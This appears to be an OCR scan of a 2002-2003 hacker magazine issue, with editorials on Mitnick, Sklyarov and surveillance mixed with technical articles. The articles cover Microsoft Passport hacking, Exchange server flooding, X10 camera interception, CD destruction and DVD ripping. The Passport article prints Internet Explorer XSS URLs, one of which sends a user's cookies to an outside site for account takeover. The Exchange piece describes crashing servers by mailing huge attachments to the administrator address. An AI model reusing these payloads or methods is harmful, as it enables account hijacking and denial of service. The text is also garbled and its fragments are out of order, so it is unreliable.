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"Voice or no voice, the people can always be brought 
to the bidding of the leaders. That is easy. All you have 
to do is tell them they are being attacked, and denounce 
the peacemakers for lack of patriotism and exposing 
the country to danger. It works the same in any country.” 
- Hermann Goering, Hitler's designated successor, 
before being sentenced to death at the Nuremberg trials. 
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having every conceivable bit of data easily 
available - from medical records to credit card 
purchases to Internet activity. It doesn't take 
much to figure out that since they don't know 
who the terrorists are they will have to scruti- 
nize all of us using these yet to be invented 
tools. It's clearly a sensitive topic for the folks at 
Defense Advanced Research Projects Agency 
(DARPA) who won't even reveal how much 
money is being allocated for this. While public 
pressure has yet to kill this beast, it's probably 
one of the few things that can. Public ridicule 
has already put an end to the TIA logo - a pyra- 
mid with an all seeing eye within it, apparently 
looking out over the globe. That also never 
happened. 

As we go to press, yet another monitoring 
plan is being announced - this time one that 
makes Carnivore look friendly. It's part of a re- 
port entitled "The National Strategy to Secure 
Cyberspace" and it would require Internet Ser- 
vice Providers to participate in a centralized 
system that would theoretically allow the entire 
Internet to be monitored along with its users. 
The apparent frustration the government is feel- 
ing is summed up in this statement by one of the 
plan's coordinators: "We don't have anybody 
that is able to look at the entire picture. When 
something is happening, we don't know it's hap- 
pening until it's too late." That is why the plan 
will fail. What they want is not only impossible 
but it flies in the face of everything the net rep- 
resents. It would be the equivalent of wiretap- 
ping everyone at all times and we suspect most 
people just aren't going to go for that. Expect a 
backlash on this like nothing we've ever seen - 
if this scheme even makes it to spring. 

Absurd and ridiculous as some of these 
plans may be, it's no excuse for not remaining 
vigilant and fighting those who endanger our 
freedom. Our victories may appear to be few 
and far between but they are quite significant. 
As is the fact that none of them could have been 
accomplished without a degree of organization 
and activism. Whether the cause is ending the 
suffering of a single person, overturning a really 
bad law, or preserving everyone's right to pri- 
vacy, reaching out to like-minded individuals 
and helping to make it a major issue is critical. 
It's gotten us this far and it will continue to be 
our strongest weapon. 
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Part of the DMCA stipulates that there has to 
be intent and this was something the jury was 
unable to find in this case. It doesn't address the 
overall stupidity of the law itself which means 
there will be more such cases. But it's a good 
start and a significant step towards fixing the 
numerous problems caused by this horrible leg- 
islation. And most importantly, it's proof that 
determination and standing by one's convictions 
can ultimately lead to victory. 

We have to also remember that there's a big 
world out there, one that doesn't always initially 
grasp the importance of the issues we value. It's 
easy to dismiss the general public as ignorant 
and pawns of the mass media. But, as in all 
things, the truth is never quite that simple. The 
general public can get it, they do tend to value 
the things that we do, and they are most defi- 
nitely not the enemy. The jury in the Elcomsoft 
case is living proof of this. The key is getting 
the message out. 

Over the past year or so we've reported 
(along with many others) some of the really bad 
ideas that have been passed down from Capitol 
Hill as a "response" to terrorism - things like the 
Patriot Act, the Homeland Security color 
scheme, Operation TIPS, Total Information 
Awareness, etc. And while many of these things 
are still around, public awareness and public 
criticism has soared - and it's most definitely 
made a difference. 

People are taking more time to think these 
things through and more of them seem to be re- 
alizing that diminishing our freedoms really is- 
n't going to accomplish a whole lot - other than 
diminishing our freedoms. We've seen less talk 
of the alert status color coding system as it 
becomes mocked more than it's used. 

The TIPS system was heavily criticized for 
its Stasi-like system of informing on one's 
neighbors and having untrained civilians prowl- 
ing around looking for potential thoughtcrime. 
And in true Orwellian style, all mention of TIPS 
was removed from the citizencorps.gov website 
where it had been prominently featured. It never 
happened. 

The Total Information Awareness initiative 
is still very much with us. In their own words, 
TIA is meant to be a "total reinvention of tech- 
nologies for storing and accessing informa- 
tion... although database size will no longer be 
measured in the traditional sense, the amounts 
of data that will need to be stored and accessed 
will be unprecedented, measured in petabytes." 
All of this will supposedly identify terrorists by 
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found time to testify before a Senate subcom- 
mittee on the dangers of bad technology and un- 
informed people. He also provided key 
evidence in a case against Sprint who had the 
audacity to claim that their switches were 
unhackable. 

It would have been easy to dwell on the neg- 
ative in this case - and there certainly was no 
shortage of negativity. After all, Mitnick hadn't 
actually had a real day of freedom since 1988 
meaning that when all is said and done, fifteen 
years will have gone by since this all started. 
And in all that time, there was never a charge 
filed against Mitnick of anything more substan- 
tial than making free phone calls and looking a 
source code that didn't belong to him. It was all 
an incredible waste of time. But we get nowhere 
by letting our bitterness dictate how we live. We 
have everything to gain by continuing forward 
in our spirit of curiosity, education, and 
rebellion against conformity. 

There's always a price to pay in order to take 
those steps and sometimes it's a heavy price, 
Dmitry Sklyarov spent time in an American 
prison and was unable to return to his native 
Russia for nearly six months - simply because 
he wrote a program that could be used in a way 
that violated the absurd Digital Millennium 
Copyright Act. It made no difference that he 
wrote the program in another country. Even 
Adobe, the company that originally pressed 
charges against Sklyarov, realized how ridicu- 
lous the whole thing was and tried to drop it, 
But it was too late and the American justice sys- 
tem went to work, eventually putting Sklyarov's 
company (Elcomsoft) on trial instead in ex- 
change for his testimony. The authorities didn't 
count on the defendants putting on a strong fight 
and they didn't count on the massive show of 
support for Sklyarov. 

There's a reason so few cases ever make it to 
a jury. People are rightfully terrified of the sys- 
tem and what it can do to them. It's ironic that it 
took someone from outside our country to stand 
up to the system and refuse to be intimidated. 
The trial took place in December and it only 
took the jury one day to rule in Sklyaroy's and 
Elcomsoft's favor. 
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In the fast paced culture that we seem to find 
ourselves caught in the middle of, it's very easy 
to get stuck in a default mood of euphoria or de- 
spair. Lately it seems that we've been despairing 
quite a bit. We're certainly not alone. 

While it's very important to not lose sight of 
the bad and ominous things that are happening 
in the world of technology and what it could do 
to people like us, nothing is gained if we lose 
our overall positive outlook. We certainly 
couldn't have kept on publishing for nearly 
twenty years if we didn't feel a strong sense of 
hope for the future. 

There will never be a shortage of negative 
issues to focus upon. Let's take a brief moment 
to look at the positive developments. 

By the time you read this (and hopefully bar- 
ring any last minute unfortunate circum- 
stances), the excruciatingly long ordeal of 
Kevin Mitnick will have finally reached an end. 
January 20, 2003 was the date that Mitnick's su- 
pervised release came to an end - three years af- 
ter his release from prison. That means that he 
will once again be able to use the Internet, travel 
without having to ask permission, and talk to 
anyone he wishes to without having to check to 
see if they've ever been convicted of a crime. 
Most of us take these freedoms for granted so 
it's hard to even imagine what life must be like 
without them. 

In these past three years, Mitnick has be- 
come a model for someone who can overcome 
adversity and triumph in the end. Despite five 
years of isolation and the aforementioned re- 
strictive conditions upon his release, he refused 
to let the system defeat him. The authorities 
made it almost impossible for him to earn a liv- 
ing - insisting that he not be allowed anywhere 
near a computer and at one point suggesting that 
he pursue a career in fast food. Instead Mitnick 
landed a job at a major talk radio station and an- 
swered listener questions about technology. He 
had kept himself educated on all the technologi- 
cal advances, despite being incarcerated and 
forbidden from experimenting with them upon 
his release. More recently he had a book pub- 
lished on the intricacies of social engineering 
and went on a government-approved speaking 
tour to promote it. Throughout this, Mitnick 
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a technique must be established to store these 
cookies on an imposters web browser. Many 
methods can be utilized for this step, and the orig- 
inal article gives sample code for one. This final 
step will complete the impersonation, and the im- 
poster can then pose as the user whose account 
was compromised by visiting any Passport 
enabled website. 
Summary 

Due to the fundamental flaws in the design of 
the Passport mechanism, I do not recommend that 
it be used in conjunction with sensitive data or 
personal information. The convenience is not 
worth the security risks, and it is likely that this 
article does not represent the last of such risks. As 
I mentioned earlier, the mechanism itself is fun- 
damentally flawed; articles such as this merely 
describe techniques that can be used to exploit 
these flaws. 

For those who are currently using a vulnerable 
Web browser and wish to continue to use it, visit 
http://www.microsoft.com/windows/ie/down- 
loads/critical/q313675/default.asp and install the 
security patch. There are many websites that uti- 
lize cookies in order to maintain state, and using a 
vulnerable browser places you at risk of many at- 
tacks similar to the one described here. 

An interactive demonstration of the technique 
described in this article is located at http;//shi- 
flett.org/demos/passport hacking revisited/. 


As an admin you have the ability to create an 
account during install that is not the same as the 
default administrator account in the OS. But not 
many elect to do this because of the log on/log off 
hassle to administer the OS along with a separate 
account to administer Exchange. If a separate Ex- 
change admin account was not created at the time 
of install (which is almost always the case) and 
it's an NT4 server, then it's almost guaranteed that 
administrator? whoever.com exists, because you 
can't rename the administrator account for the OS 
in NT. If it's à Win2K server with Exchange 5.5 
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All cookies that would be made available to a 
server-side script in the www.passport.com do- 
main will appear in the alert box. The significance 
of this example is that we now have a technique 
for executing a client-side script that has access to 
any cookies from any domain we choose. When 
combined with Passport's complete dependence 
on cookies, the danger should be clear. 

The Compromise 

The only step remaining for a complete com- 
promise is to establish a method to get the cook- 
ies sent to the web server where they can be 
stored and subsequently retrieved by the im- 
poster. To do this, I will use a URL similar to the 
last example, except that the script will redirect 
the user to a remote URL and append the cookie 
data in the query string öf that URL: 

about://www.passport.com/<script%20lan- 
guage=javascript>document.location='http://shi- 
flett.org/demos/passport_hacking_revisited/?coo 
kies='+document.cookie</script> 

The most dangerous characteristic of this 
technique is that no interaction from the user is 
required. Because of this characteristic, an at- 
tacker can'redirect the user through many URLs 
that will compromise the cookies from many dif- 
ferent domains rather than just one. This makes 
Internet Explorer versions 5.5 and 6.0 even more 
dangerous than the previous versions with re- 
gards to cookies. In addition, this compromise is 
even easier to achieve than the original, requiring 
very little expertise on the part of the attacker. 

Once the cookies are stored on the web server, 


by ddShelby 

Security in Exchange is or should be a con- 
cern for many admins out there because of its 
fairly widespread use in many small to mid sized 
organizations. It does have some worthy features 
but also has some serious security concerns (like 
everything from Redmond) that need to be at- 
tended to. And that is the purpose of this article. 
To inform and educate those who read it and 
maybe expose a few Exchange admins to some 
information they might find useful. So let's get 
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The Vulnerability 

The vulnerability that exists in Internet Ex- 
plorer versions 5.5 and 6.0 was originally al- 
luded to on the web at http://www.solutions- 
.f/index.cgi/news 2001 11 O8?lang-eng. In 
order for a website to gain unauthorized access 
to a user's cookies, an about: URL is used to de- 
ceive the web browser so that it executes client- 
side scripts in the local context with regards to. 
security restrictions. Thus, a client-side script 
can potentially have as much access to your 
computer as you do. 

An example of a URL exploiting this vul- 
nerability is the following: 
about://<script%20language=javascript>alert('This 
%2Obrowser%20is %20vulnerable.')</script> 

A vulnerable browser will execute this 
client-side script, which will display the fol- 
lowing alert box: 


TE ——— 
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The significance of this is more extreme 
than this example illustrates. Because Internet 
Explorer executes this client-side script in the 
local context, this script has fewer security re- 
strictions than client-side scripts that Internet 
Explorer believes to be sent from a remote web 
server. In addition, we can make a simple mod- 
ification to our URL to make the domain check- 
ing mechanism in Internet Explorer mistake the 
URL for one from any domain we choose when 
it checks for cookie restrictions, For example: 
about://www.passport.com/<script%20language=j 
avascript»alert(document.cookie )«/script» 

If you are currently logged into Microsoft 
Passport when visiting this URL, an alert box 
similar to the following will appear: 


by Chris Shiflett 
chris @shiflett.org 

This article is a follow-up article to "Pass- 
port Hacking,” an article published in 18:3. 
Much of the information here is given under 
the assumption that you are familiar with the 
original article, so you should read it first. The 
original article was the first to reveal the secu- 
rity vulnerability in Microsoft Passport that 
prompted Microsoft to discontinue the Passport 
service for a short period of time while im- 
provements were made. Other articles have ap- 
peared since the original, and it has been 
translated into several different languages. Un- 
fortunately, the Passport mechanism possesses 
the same fundamental flaws that it did when the 
original article was written, though attempts 
have been made to mitigate these risks by im- 
posing shorter timeout periods and requiring 
users to re-authenticate themselves more often. 

Background 

In "Passport Hacking," I introduced the Mi- 
crosoft Passport mechanism and its inherent in- 
security characterized by a complete 
dependence on cookies. Though cookies can be 
an adequate means of maintaining state in 
HTTP transactions, they are a poor choice for 
user authentication. Using cookies and URL 
variables, Microsoft communicates with Pass- 
port enabled sites through the user alone; there 
is no server to server communication. This is 
the fundamental design flaw that exposes Pass- 
port users to all of the security vulnerabilities 
that have been published to date. 

The vulnerability used to compromise a 
Passport account in the original article involved 
using a malformed URL to expose a user's 
cookies to an unauthorized website. This vul- 
nerability only existed in Microsoft Internet 
Explorer versions 4.0 - 5.0, so this technique 
could not be used to compromise the Passport 
account of people using Internet Explorer ver- 
sions 5.5 and 6.0. This article will demonstrate 
a technique that can be used to compromise the 
accounts of people who use these newer ver- 
sions of Internet Explorer and will direct Inter- 
net Explorer users to the patch that will fix this 
vulnerability. 
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Win2K laptop but many others work just the 
same. A scan of a range of addresses to port 25 
will eventually reveal an open port. If it's an Ex- 
change server it will identify itself as such, as 
well as the version and build. For example: 25 
SMTP 220 server.domain.whoever.com ESMTP 
Server (Microsoft Exchange Internet Mail Ser- 
vice 5.5.2653.13) ready. In this example it's a 5.5 
SP4 server. With that, the domain is known, the 
administrator address can be correctly assumed 
95 percent of the time or better, and the rest is up 
to any delinquent with nothing better to do. Or at 
some point some worm will make its way to the 
Internet and play this same game, only faster. 


reaches its limit again. In addition, the defrag 
needs drive space equal to or greater than the size 
of the database. But this inevitably brings me 
back to admins who were bagging groceries six 
months ago. Another safety net would be to im- 
plement a second MX record for the domain with 
a higher cost route, so any incoming mail rejected 
by Exchange would be collected on another ma- 
chine. Then with ETRN you could dequeue the 
mail from the higher cost server and no mail 
would be lost. 
Discovery of a Server 

Regardless of the presence of a firewall, by 
using one of the many port scanners an Exchange 
server is easy to find. 1 use Super Scan on my 
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can't figure out how to do it, fire up the IM client 
on your Mac and ask your grandmother. 

I mounted the monitor and receiver on my 
dashboard with Velcro. If this method obstructs 
your view you can put the monitor on the passen- 
ger seat or floor. Make sure you don't mount any- 
thing where it might hinder the deployment of an 
airbag. 

Now hit the road. 1 found my first camera 
within 60 seconds on the very next block. I 
typically find one about every 15 minutes. 

In closing here are a few things I learned the 
first day: 

- Don't worry about the channel switch on 
your receiver - most folks leave it on the default 
channel "A", 

- The transmitters have a range of only around 
100 yards so you will need to be somewhat close 
to your target. 

- You'll tend to get audio before video, so 
you'll know you are onto something when the sta- 
tic on the TV goes away. Keep your eyes on the 
road and pull over when you start receiving 
audio, 

- You'll notice several definite patterns appear 
on the monitor at times. For example, I have seen 
both narrow and wide horizontal lines. If you 
identify the devices that cause them, write to the 
Letters section of 2600 and let everyone know. I 
would bet one of them is a 2.4 GHz cordless 
phone.... 

- I was able to get perfect cable TV twice. Is 
someone using wireless for extensions or 
something? 


by Particle Bored 
Are you having a Hard time figuring out what 
to do with your X10 camera now that you are 
done playing practical jokes on friends and fam- 
ily? For less than $50 you can put the X10 re- 
ceiver in your car and begin screwing around 
with complete strangers. 

Standard disclaimer; 1 don't accept responsi- 
bility for my own actions, so I definitely won't as- 
sume responsibility for yours. If TV's in vehicles 
are illegal in your area, or should you get decapi- 
tated from a TV flying around in your car it's your 
problem. 

Here is what you will need to get started: 

Jensen J53-BW TV/Monitor (only $25 at Target) 

X10 Receiver 

DC Power cord with "L" connector 

DC Power "Y" adapter 

Velcro 

The Jensen TV is a 5" black and white 
portable monitor that has both video and audio 
RCA input jacks. It can run on AC, DC, or batter- 
ies and comes with a car lighter adapter. 

The X10 receiver is intended for indoor use, 
so it is shipped with only an AC adapter. If you 
look at the output of the adapter though, you'll see 
that it is 12 volt DC which means you can run the 
receiver straight off your car battery. Since I 
wanted the system to be easily removed, I de- 
cided to power it with another lighter cord (the 
one with the "L" connector). It is positive-tipped, 
so make sure you have the polarity right. 

Now plug everything together. Nearly all of 
the connectors can only go in one place. The 
RCA connectors are fully color-coded, so if you 
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mail, one large attachment could do the same. 
use any general user's address is slightly 
difficult since users usually read their mail. Bi 
the administrator account is almost never used 
since admins set up an address for themselves 
use it instead. 

As drive space comes close to zero available, 
the Exchange service that handles SMTP (IMS) 
shuts down and all incoming mail is rejected. But 
since the information store service (the database) 
usually continues to run, and if the admin is smart 
enough to check the private information store 
listed in Exchange Admin, he would see the 
tremendous size of the mailbox and then just log 
into it and clean it out. An easy fix for this is to 
just edit the SMTP address of the administrator 
account to something obscure. In addition, you 
could disable any unused SMTP addresses to help 
prevent getting swamped. A periodic check of 
available drive space or the size of the .edb files 
would be useful, but seems to escape many 
admins, 

But Wait, It Gets Worse 

As opposed to reaching the drive space limit, 
if the 16GB database limit is reached instead, it 
becomes a whole different story. If the Enterprise 
version is installed before the 16 GB limit is 
reached, then disaster can be avoided. However, 
if the 16GB limit is reached before upgrading, the 
information store service is shut down automati- 
cally and can't be restarted. The result from this 
is all incoming SMTP messages are rejected at 
the server and no user can log in to their respec- 
tive mailbox. And the admin can't get the service 
started to log in and delete the offending content, 
As an admin you can purchase the Enterprise edi- 
tion for two grand, but installing it on top of the 
standard edition doesn't quite solve the problem, 
All is not lost - there is a workaround for this 
listed in the Knowledge Base that explains how to 
copy the database into the active folder (usually 
exchsrvr\MDBDATA) after you install the Enter- 
prise version. But if the database has reached the 
16GB limit you'll be copying for a while. If the 
admin is savvy enough, he could play the game of 
just renaming folders instead of copying. But | 
with so many Windows admins who changed ca- 
reers from grocery bagging, it's unlikely they're 
smart enough to figure that out. And as the 
Knowledge Base article suggests to copy the .edb 
file, it seems to me that at least one employee at 
Redmond didn't figure it out either. Admins could 
also defrag the database with a utility included 
with Exchange in the exchsrvr\bid folder called 
eseutil (both 5.5 and 2000). This would buy 
enough time to delete enough and recover. But if 
the SMTP service IMS is running and email is 
still incoming, it could be a race to delete before it 


or Exchange 2000, the same is also true. But with 
the ability to rename the default administrator ac- 
count in the OS, there is a chance it was renamed 
at the time of setup. In both cases (assuming de- 
fault) the administrator account for the OS has an 
SMTP address that follows the convention: ad- 
ministrator@whoever.com. If the OS is NT4, 
then it's a shoe-in unless the SMTP settings were 
edited by the admin. This is the problem. 
Some Basics of Exchange 

The standard version of Exchange 5.5 and 
2000 both have a limit on the size of either the 
public or private database (priv.edb and pub.edb). 
They cannot exceed 16 GB each. The Enterprise 
versions of 5.5 and 2000 are not limited to any- 
thing except available drive space. With server 
drive space still somewhat costly (assuming the 
server runs with some form of SCSI and raid), 
reaching this limit is not difficult for most organi- 
zations of a dozen users or more. Two reasons 
why it's so easy to get to 16 GB or reach the 
server's available drive space limit is the disre- 
gard of most admins towards limiting users’ mail- 
box size and the users' habit of using Outlook 
deleted items folder as an archive folder. The ad- 
min has the ability to force notification limits on 
users’ mailbox size on either a global or per user 
basis. The spam issue is also partly to blame since 
everyone just deletes it, but the mentality of using 
the deleted items folder as an archive comes back 
to haunt again, only adding to the total size of the 
database. So the 16 GB limit is in many cases 
closer than one might think. This is especially 
true if none of the limits were ever put in place 
and the server has been in use for a year or longer. 
It's made worse by the fact that small organiza- 
tions don't need a monster server to run Exchange 
5.5 and with the hardware requirements set forth 
by Win2K server, many have elected to stay with 
NT4 and Exchange 5.5. An NT4/Exchange 5.5 
server could easily serve a dozen users on a P200 
with 32 megs of ram and a single 10 GB IDE 
drive. Don't laugh, I've seen it. 

Getting back to the point. Any Exchange 
server is vulnerable to getting swamped and not 
by some new hack. You can crash Exchange by 
simply knowing any e-mail address of any recipi- 
ent on any given server. The ugly part is this 
could potentially happen over days or weeks or 
even months before it's even noticed or it's just 
too late. Since Exchange by default has an ac- 
count assigned to the Administrator of the OS, an 
SMTP address exists for it. If you assume that the 
administrator account is not actually in use but 
still exists, one could theoretically swamp an Ex- 
change server by sending numerous e-mails with 
large bogus attachments. Or if the sender's ISP 
does not impose limits on the size of outgoing 
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area to above the crystallization point - 200C - 
and then lets it cool quickly so that the atoms re- 
order themselves. The read laser is much less 
powerful. The dielectric layers that are above and 
below the phase-change compound are by defini- 
tion "poor conductors of electricity and will sus- 
tain the force of an electric field passing through 
it." So that would not allow much of the electric 
field caused by the microwave to be able to reach 
the phase-change compound layer where the data 
is stored. But then again, it's not made to stand 
the bombardment by a microwave. Also, it's a 
heat insulator so the temperatures caused by the 
reflective layer vaporizing will not affect it too 
much either. So again with advanced tools it 
might be possible to remoye the damaged 
material and put on a new reflective layer. 

Unfortunately I have no way to find this out 
for sure. I would like someone to write a follow- 
up to this article with actual lab data (Univer- 
sity), As you can see it is not known if 
microwaving is a 100 percent secure form of data 
removal for CD-Rs and RWs. It is one of the 
most secure options there is. It should hold up 
unless you have POTUS (President of the United 
States) really pissed off at you. Local police 
agencies and the FBI probably do not have the 
technology to retrieve data from a nuked CD. 
Most of the people who argue that this is possible 
also argue that "they" would just go back in time 
to before you nuked the CD.... 

Greetz: Spiffy and Sypher. 


very, very fine instruments as a CD is only 
1.2mm thick. But the main variable is how hot 
the aluminum/gold is when it vaporizes and if it 
is hot enough to change the state the dye is in - 
from transparent to making the whole disk 
opaque to a reader. From looking at a few nuked 
CD-Rs I think that most data would be lost. On a 
blank CD that is nuked, there is a "loose swirly" 
pattern of the different shades (written and un- 
written), effectively making true data impossible 
to find. On CDs with data it would do the same 
and so a lot of data would be lost. So on CD-Rs 
it's not really a guaranteed process of having 
your data fully and completely removed. Al- 
though if you're up against someone like the 
NSA/FBI/CIA who are going to all the trouble to 
find that information you have far bigger prob- 
lems on your hands and I'm guessing you'd never 
see a public court. 

CD-RWs are a little different again. Instead 
of the dye layer there's a phase-change com- 
pound composed of silver, indium, antimony, 
and tellurium. This recording layer is sand- 
wiched between dielectric layers that draw ex- 
cess heat from the phasé-change layer during the 
writing process. A CD-RW drive has to use three 
different lasers: a read laser, a write laser, and an 
erase laser. To write to a CD a laser beam heats 
areas of the phase-change material above the 
melting temperature (500-700C), so all the atoms 
in this area can move rapidly into a liquid state. 
Then, if cooled quickly enough, the random liq- 
uid state does not reorder its atoms back into a 
crystalline state. To erase, a laser heats the same 
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Some of you may remember a problem we had with a company called PSI back in 1995. To put it 
briefly, we were misled into signing a contract for ISDN service that didn't exist and almost lost a 
sizable down payment. Once we publicized the situation and stuck audio evidence of their deceit 
on our website, we got a refund in full. More recently, PSI went bankrupt (and no, we don't feel 
guilty). For some reason we wound up on their list of creditors and eventually received this check. 
They also managed to rename us from 2600 to 5393. We don't really understand any of it but if 
this is how they ran things, we may understand how they went bust. 
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CD Media Data Déstruction 


with microscopic pits arranged as a single, con- 
tinuous, extremely long spiral track of data. Once 
the plastic is formed, a thin, reflective aluminum 
layer is "sputtered" onto the disc, covering the 
bumps. Then a thin acrylic layer is sprayed over 
the aluminum to protect it. A CD reader reads 
CD-ROMs by sending out a laser beam that 
passes through the plastic layer, reflects off the 
aluminum layer and hits a device that detects 
changes in the amount of light it receives. The 
bumps, commonly called pits because if you 
could see them they would look like pits from the 
label side of the CD-ROM, reflect the light dif- 
ferently from the lands. The lands are the rest of 
the aluminum layer. The aluminum layer is very, 
very thin. When you nuke a disk, large currents 
flow through the aluminum. These currents pro- 
duce enough heat to vaporize the aluminum. You 
then see a very small lightning storm as electric 
arcs go through the vaporized aluminum. There 
will be many paths left etched through the alu- 


minum after this. So with the aluminum vapor- 


ized a CD player won't be able to read the data 
anymore. Because of the extreme heat of the alu- 
minum the plastic above and below the alu- 
minum would also be damaged. I'd be guessing 
the aluminum paths left would be horribly 
warped. Just think about what would happen to 
you if you were subjected to that kind of heat; 
I'm fairly confident that this is a 100 percent se- 
cure method of data destruction as you would not 
be able to somehow inject a new reflective mate- 
rial and fill up the microscopic pits as they would 
be damaged. Sure, that's all great if you happen 
to have a Windoze CD sitting around that you 
don't want anyone to have to experience the 
horror of. 

So what about CD-Rs? Instead of there being 
pits imprinted into the plastic of a CD-R there is 
an extra layer. This extra layer is a greenish dye 
right below the reflective material. A write laser 
heats up the dye layer enough to make it opaque. 
The read laser in a CD player senses the differ- 
ence between clear dye and opaque dye the same 
way it senses bumps - it picks up on the differ- 
ence in reflectivity. So when you nuke a CD-R 
the gold/aluminum layer vaporizes. If that is the 
only effect then it would be possible to cut the 
CD where the aluminum/gold layer used to be 
and then put a reflective substance on top of it 
and stick it in a CD player. This would require 
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by Gr3y t0qu3 
greytoque@ paladindesign.ca 

While we as hackers have an obsession with 
freedom of speech we also have an obsession 
with data destruction. I wrote this article to quell 
my - and many other peoples’ - interest in the lat- 
ter specifically dealing with CDs. "I've heard 
nuking the CD in a microwave is not 100 percent 
successful in destroying the data" was stated in 
"How to Hack From a Ram Disk" in 18:4. I tried 
to find information on this topic but there really 
is none out there, so I decided to take this task on 
for myself. 

When I started doing research for this article I 
realized that there are many ways to destroy CD- 
ROM, CD-R, and CD-RW media. The first 
things I found were targeted towards commercial 
uses. I found products that used "micro indenta- 
tion" to "reliably penetrate the data surface of 
target media, destroying any readable data" and 
as a side effect the CD went from round to an 
oval shape. Sure sounds good, right? Well if you 
have $5k to waste it's great. Then there's some 
that grind away the recording surface. The one I 
found eost $10k. Both of these solutions are not 
priced for the average person. Simply deleting 
the files from a CD-ROM/R/RW won't work ei- 
ther. There are plenty of software suites out there 
for recovering data from them. I found one for 
$39.95 and there was even a free 30 day trial. So 
if you have a low tech adversary you're hiding 
the data from even that wouldn't work. The soft- 
ware can also recover data from quick formatted 
CD-RWSs, where the data is left there just to be 
overwritten at a later time (the same concept as 
recovering deleted data from your hard drive - 
the reference to the data in the drive table is re- 
moved, the data isn't touched). Let's get to the 
main point of the article: Does data destruction 
with a microwave really work? 

First, to understand if the microwave is an ef- 
fective way to destroy data you need to under- 
stand how CDs are made. All three types of CD 
(CD-ROM, CD-R, and CD-RW) are different. In 
the next little while I'm going to look at the three 
different types and explore if it will work for 
each. 

CD-ROMs are exactly what they say, CDs 
with Read Only Memory. Most of a CD-ROM 
consists of a piece of clear polycarbonate plastic. 
During manufacturing, this plastic is impressed 
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the "Input" file box, and the other two should be 
automatically filled in for you. Click the start 
button. It will rip the MPG file into a *.m1v and 
a *.mp2 file. These we need to load into BBM- 
peg. Go to the BBMpeg folder and run 
"AVI2MPG2". It looks very confusing when it 
loads, but don't fret. Take a look around again. 
What we need to do is simply click the "Start 
Encoding" button, ignoring the very confusing 
initial interface. Click the Settings button. We 
need to set something on three out of the four 
tabs you now have access to. On the "General 
Settings" tab, set the "Max Size(MB)" to a num- 
ber equal to roughly half the filesize of the file 
you have, but don't go higher than 10MB less 
than the size of your CD you will burn it to. I 
like to keep mine set to 640MB, it seems like a 
pretty standard size. On the "Input and Output 
Files” tab, we need to set three things. The "Pro- 
gram Stream File" is the name of the output file 
you want. Your half-movies will be called [file- 
name ]01.mpg and {filename }02.mpg. Now for 
the "Video Stream File" and "Audio Stream 
File", use the *.ml v and *.mp2 files we just cre- 
ated, respectively. The last tab is the "Program 
Stream Settings". Simply choose "VCD" or 
"SVCD" from the radio buttons. The fourth tab 
allows you to save your settings for this pro- 
gram. Do so if you are going to be using it a lot. 
Click OK to get back to the "Start Encoding" 
screen, then click "Start". This shouldn't take 
very long. 

10: Now we have two (or sometimes three) 
files that are small enough to fit on CDs. Load 
up Nero. In the "Create CD" dialog, nero should 
have options for both VCD and SVCD. Select 
whichever applies. Under the ISO tab, select 
"ISO Level 2" for the filename length, and "ISO 
9660" as the character set. Also check all the 
boxes under "Relax ISO Restrictions". Now we 
are ready to burn. Click "New" and it will take 
you to a normal CD creation screen, except the 
CD window has both ۵ directory structure and a 
file list box in it. Drag your file to the white box 
under the directory tree, not into the tree itself, 
even if you know where it goes. Nero will check 
the file. If it complains, just ignore it. It should 
still work. Now burn... and you will have your- 
self a fresh VCD or SVCD. Repeat this step for 
the rest of the disks needed to get the full movie. 

11(V): Playing VCDs on computers: You 
can use a software VCD player, or just go into 
the CD and open "AVESQO1.dat" in the "MPE- 
GAV" folder with your favorite media player. 
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have a *.d2v and a *.wav file. We need to merge 
these into a single MPG file. Fire up TMpgEnc. 
Once again, take a look at what it can do before 
trying to rip - this program in particular is very 
useful. I highly recommend playing with the 
"MPEG Tools" under the file menu. Now that 
you are ready to go, check out the bottom of the 
main TMpgEnc screen. You have three boxes 
there: "Video Source", "Audio Source", and 
"Output File Name". For video source, we want 
the *.d2v file we just created, and for audio we 
want the *.wav file. (Side note: listen to the 
wave before finishing this step. If it's not the au- 
dio track you want, go back to the DVD2AVI 
step and select a different audio stream from the 
audio menu until you get the one you want.) For 
the Output file name, select where you want the 
MPG file to be saved. Now we need to set up 
the encoder. Click the "Load" button next to the 
output file name box, and navigate to the "TMp- 
gEnc\Template" folder. From here we have the 
choice of loading a number of templates, but 
we're interested in only four: VideoCD (NTSC), 
VideoCD ^ (NTSCFilm), SuperVideoCD 
(NTSC), and SuperVideoCD (NTSCFilm). 

8(V): VCD users check where you wrote 
down the "Video Type" from the end of step 6. 
If it was higher than 90 percent Film, load the 
"VideoCD (NTSCFilm)" template. If the video 
type was anything else, just load "Video- 
CD(NTSG)". Now click setting. Leave every- 
thing alone except for this setting: Under 
advanced, change the "Source Aspect Ratio" to 
what you wrote down from "Aspect Ratio" at 
the end of step 6. Now click OK to go back to 
the main window. You're ready to convert to 
MPG. Click "Start" in the top left corner and 
then get some sleep. It takes up to three hours 
on a 2ghz Athlon machine, probably much 
much longer for most of you. 

8(S): Video CD users, use the instructions 
from step 8(V) - just load the SuperVideoCD 
templates. 

9: Boy, that took a while. Now we have an 
mpg file of the complete movie. Check it for 
quality, audio synch, and general not-being- 
screwed-up. When you're satisfied that the file 
is complete, it is safe to delete all the other files 
that you used for this project. Now the file 
should be roughly a gig for a normal length 
movie. We need to split it up. Stay in TMpgEnc. 
Remember when I mentioned the cool MPEG 
Tools? We're going to use one of them now. Go 
to file-|MpegTools. Click the "Simple De-Mul- 
tiplex" tab. Load the mpg file of the movie into 


Winter 2002-2003 





How to Make a DVDR- 7 





























"Max Filesize". Now set the max-filesize ۱ 
10,000MB (10gb). This way the movie will b 
ripped to one big file on your hard disk. (Warn 
ing! This is only possible with NTFS. If yc 
have a FAT file system, set max-filesize to 
4,000MB.) 
3: Click start and wait until the DVD is 
finished. It shouldn't take more than an hour. 
4: Fire up DVD2AVI. Once again, I recom: 
mend taking a look around the program befor 
blindly trying to follow my steps. Go to 8 
Jopen. A blank box will appear with three bu 
tons on the left side. Click "Add" and add 
file(s) you just ripped to the box, then click Ol 
5: Press F5 to make sure the movie loo 
OK and the VOB files are in the right order. Ye 
will not have audio and the video will be fi 
This is normal. Make note of the aspect ratio ( 
the box that pops up along the right side. Yo 
are almost ready to convert to either AVÎ 
d2v/wav. Check your menu settings. For aud 
Track number should be "I", channel for 
should be "Auto", Dolby Digital should be "D 
code", MPEG Audio should be "Demux", ai 
48-]44.1 should be off. Video settings should 
left alone. 
6(A): AVI users rejoice! This is the last § 
for you! Go to file-]save AVI, pick a filenan 
and location, and click "Save". Now a box poj 
